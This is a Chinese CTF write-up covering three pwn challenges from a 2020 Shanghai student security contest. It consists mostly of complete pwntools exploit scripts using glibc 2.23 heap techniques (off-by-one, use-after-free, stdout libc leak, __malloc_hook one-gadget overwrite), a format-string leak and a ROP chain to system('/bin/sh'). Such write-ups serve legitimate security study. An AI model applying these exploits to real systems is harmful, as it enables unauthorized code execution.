2020上海大学生网络安全竞赛

除了lgtwo都是抄的别的地方的题(有可能lgtwo也是抄的),👴真是服

lgtwo

  • Off-by-one和爆破stdout
  • 没有pie所以有了libc之后还可以unlink去bss上改堆记录指针

exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

#context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'
#io = remote('123.56.52.128',45830)
elf = ELF('./lgtwo')
libc = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so')
ld = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so')
# Launch the target through the bundled 2.23 loader with that loader's libc
# preloaded, so the libc symbol offsets used later refer to this exact build.
preload_env = {"LD_PRELOAD": libc.path}
io = process(argv=[ld.path, elf.path], env=preload_env)

def add(size, con='A'):
    """Menu option 1 (newline-terminated prompts): allocate a note.

    `size` is sent as the requested length and `con` is sent raw (no trailing
    newline) as the note content.
    """
    for prompt, answer in (('>> ', '1'), ('size?\n', str(size))):
        io.sendlineafter(prompt, answer)
    io.sendafter('content?\n', con)

def add2(size, con='A'):
    """Menu option 1, matching the prompts without a trailing newline.

    Same protocol as `add`: send `size`, then `con` raw as the note content.
    """
    for prompt, answer in (('>> ', '1'), ('size?', str(size))):
        io.sendlineafter(prompt, answer)
    io.sendafter('content?', con)


def dele(idx):
    """Menu option 2 (newline-terminated prompts): free note `idx`."""
    choice, index = '2', str(idx)
    io.sendlineafter('>> ', choice)
    io.sendlineafter('index ?\n', index)
def dele2(idx):
    """Menu option 2, matching the prompts without a trailing newline."""
    choice, index = '2', str(idx)
    io.sendlineafter('>> ', choice)
    io.sendlineafter('index ?', index)

def edit(idx, con):
    """Menu option 4 (newline-terminated prompts): overwrite note `idx`.

    `con` is sent raw, without a trailing newline.
    """
    for prompt, answer in (('>> ', '4'), ('index ?\n', str(idx))):
        io.sendlineafter(prompt, answer)
    io.sendafter('content ?\n', con)

def edit2(idx, con):
    """Menu option 4, matching the prompts without a trailing newline.

    `con` is sent raw, without a trailing newline.
    """
    for prompt, answer in (('>> ', '4'), ('index ?', str(idx))):
        io.sendlineafter(prompt, answer)
    io.sendafter('content ?', con)
#fake = 0x7f0823975620
# Stage 1: set up five notes, write one byte past note 0 (the off-by-one noted
# above), then read a libc pointer back from the program's output.
add(0x18) #0
add(0x18) #1
add(0x68) #2
add(0x18) #3
add(0x10) #4
gdb.attach(io)  # debugger attach is live here; the later one is commented out
edit(0,'A'*0x18+'\xb1') #0
#unsort
dele(1)
#fastbin
dele(2)

add(0x18) #1
add(0x88) #2
edit(2,'\xdd\x25')
edit(1,'a'*0x18+p8(0x70))
#gdb.attach(io)
add(0x68) #5
add(0x68) #6
edit(6,0x33*'\x00'+p64(0xfbad1800)+p64(0)*3+'\x00')
# Keep the 6 bytes ending at the 0x7f terminator, widen to 8, and subtract the
# build-specific constant to recover the libc base.
libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 3954176
log.success('libc: '+hex(libc_base))
system = libc_base + libc.sym['system']  # computed but not used below
one = [0x45226,0x4527a,0xf0364,0xf1207]  # libc-relative offsets; only one[1] is used

# Stage 2: repeat the note setup, now driven through the *2 helpers, whose
# prompts are matched without a trailing '\n'.
add2(0x18) #7
add2(0x18) #8
add2(0x68) #9
add2(0x18) #10
add2(0x10) #11

edit2(7,'A'*0x18+'\xb1')
dele2(8)
dele2(9)
add2(0x18) #8
add2(0x88) #9
edit2(9,p64(libc_base+libc.sym['__malloc_hook']-0x23))
edit2(8,'a'*0x18+p8(0x70))
add2(0x68) #12
add2(0x68) #13
edit2(13,(0x13-8)*'\x00'+p64(one[1]+libc_base)+p64(libc_base+libc.sym['realloc']+2))
#edit2(13,0x13*'\x00'+p64(one[0]+libc_base))
# One more allocation request, then hand the session over to the user.
io.sendlineafter('>> ','1')
io.sendlineafter('size?','10')
io.interactive()

majone

  • 国赛原题,一毛一样,字符串都没改
  • uaf漏洞,换了一种方法,利用假堆块构造overlap

直接放exp:

from pwn import *

# tmux split for gdb.attach; 'info' keeps the retry loop's output readable.
context(terminal=['tmux', 'splitw', '-v'], log_level='info')

io = process('./pwn')
elf = ELF('./pwn', checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
# libc-relative offsets for the system libc; pwn() uses index 3
one = [0x45226, 0x4527a, 0xf0364, 0xf1207]

def add(size, tag, ch=1):
    """Menu option 1: allocate a note of `size` bytes tagged `tag`.

    The fixed 'question' prompt is always answered with '81'.  `ch` selects
    the prompt variant: 1 matches prompts with a trailing newline, any other
    value matches them without it.
    """
    tail = '\n' if ch == 1 else ''
    io.sendlineafter('>> ', '1')
    io.sendlineafter('question\n' + tail, '81')
    io.sendlineafter('?' + tail, str(size))
    io.sendlineafter('?' + tail, tag)



def dele(idx, ch=1):
    """Menu option 2: free note `idx`.

    `ch` == 1 matches the index prompt with a trailing newline, otherwise
    without it.
    """
    tail = '\n' if ch == 1 else ''
    io.sendlineafter('>> ', '2')
    io.sendlineafter('index ?' + tail, str(idx))

def edit(idx, con, ch=1):
    """Menu option 4: overwrite note `idx` with `con` (sent raw, no newline).

    `ch` == 1 matches the prompts with a trailing newline, otherwise without.
    """
    tail = '\n' if ch == 1 else ''
    io.sendlineafter('>> ', '4')
    io.sendlineafter('index ?' + tail, str(idx))
    io.sendafter('content ?' + tail, con)

def pwn():
    """Drive one full attempt against the current module-level `io` process.

    Uses the newline-terminated prompt variant (ch=1) up to the libc leak and
    the bare variant (ch=2) afterwards.  Errors propagate to the module-level
    retry loop, which restarts the process and calls this again.
    """
    add(0x10,'0')
    add(0x20,'1')
    add(0x58,'2')
    add(0x68,'3')
    add(0x10,'4')
    edit(1,p64(0)*3+p64(0x21)) #fake offset 0x50
    dele(0)
    dele(4)
    edit(4,'\x40')  # note 4 is edited after it was freed (the UAF noted above)
    #gdb.attach(io)
    add(0x10,'5')

    #get fake chunk
    add(0x10,'6')
    edit(6,p64(0)+p64(0xd1))

    dele(2)
    dele(3)
    add(0x58,'7')
    edit(3,'\xdd\x55')
    #gdb.attach(io)
    add(0x68,'8')

    #get stdout
    add(0x68,'9')
    edit(9,51*'A'+p64(0xfbad1800)+p64(0)*3+'\x48')
    # Everything up to the 0x7f terminator is padded to 8 bytes and fed to u64,
    # which requires exactly 8 bytes: a longer read raises, and the retry loop
    # treats that as a failed attempt.
    libc_base = u64(io.recvuntil('\x7f').ljust(8,'\x00'))-3954339
    log.success('libc: '+hex(libc_base))
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    # From here on the prompts are matched without a trailing '\n' (ch=2).
    dele(8,2)
    edit(8,p64(malloc_hook-0x23),2)
    add(0x68,'10',2)
    add(0x68,'11',2)
    edit(11,0x13*'\x00'+p64(one[3]+libc_base),2)
    # One more allocation request; the caller then opens the interactive session.
    io.sendlineafter('>> ','1')
    io.sendlineafter('question\n','81')
    io.sendlineafter('?','10')

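#pwn()
# Retry until one run of pwn() completes without error; a failed attempt tears
# the process down and starts a fresh one.  Only ordinary exceptions are
# retried -- the original bare `except:` also swallowed KeyboardInterrupt, so
# Ctrl-C could not stop the loop.
while True:
    try:
        pwn()
    except Exception:
        io.close()
        io = process('./pwn')
    else:
        break

io.interactive()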

easyabnormal

  • 据说湖湘杯原题,湖湘杯睡觉了,没打,有空学一下

exp:

from pwn import *
context(log_level='info', os='linux', arch='amd64')
#p=remote('123.56.52.128','10012')
libc = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so')
ld = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so')
elf = ELF("./easyabnormal")
# Run the target under the bundled 2.23 loader with its libc preloaded, so the
# libc symbol offsets used below refer to this exact build.
target_argv = [ld.path, elf.path]
p = process(argv=target_argv, env={"LD_PRELOAD": libc.path})
def name():
    """Menu option 1: wait for the CHOICE prompt and select it."""
    p.sendlineafter("CHOICE :", '1')

def add(content):
    """Menu option 2: create a note whose content is `content` (newline-terminated)."""
    p.sendlineafter("CHOICE :", '2')
    p.sendlineafter("cnt:", content)
def free(id):
    """Menu option 3: free the note at index `id`."""
    p.sendlineafter("CHOICE :", '3')
    p.sendlineafter("idx:", str(id))
def show():
    """Menu option 4: ask the program to list the notes."""
    p.sendlineafter("CHOICE :", '4')
def backdoor(content):
    """Hidden menu option 23333: send `content` raw after the INPUT prompt."""
    p.sendlineafter("CHOICE :", '23333')
    p.sendafter("INPUT", content)

# The name field is the format string noted above; the printed value is read
# back after selecting option 1.
p.recvuntil(":")
p.send('%11$p')#leak
name()
p.recvuntil('INFO:')
# 14 hex characters ('0x' + 12 digits), adjusted by the fixed 240-byte delta
# and __libc_start_main's symbol offset to get the libc base.
libc_base = int(p.recv(14),16)-240-libc.sym['__libc_start_main']
print(hex(libc_base))

# libc-relative offsets for this 2.23 build
ret = libc_base + 0x937
pop_rdi= libc_base + 0x21112

system = libc_base + libc.sym['system']
print(hex(system))
# .next() is the Python 2 iterator method; as written this script does not run
# under Python 3 (which would need next(...)).
str_binsh = libc_base + libc.search('/bin/sh').next()
payload = p64(ret)+p64(pop_rdi)+p64(str_binsh)+p64(system)

add('a')
add('b'*0x18+payload)  # payload follows an 0x18-byte prefix in note 1
free(1)
free(0)
show()
# presumably the listing prints note 1 after "1:"; 6 bytes are widened to a pointer -- verify against the binary's output
p.recvuntil("1:")
heap_addr = u64(p.recv(6).ljust(8,'\x00'))
print(hex(heap_addr))
print(hex(libc_base))  # printed again for convenience next to the heap address
#gdb.attach(p)
#pause()
backdoor('a'*0x20+p64(heap_addr+0x20))
p.interactive()

Cpu_emulator

  • 8会做,等后续补上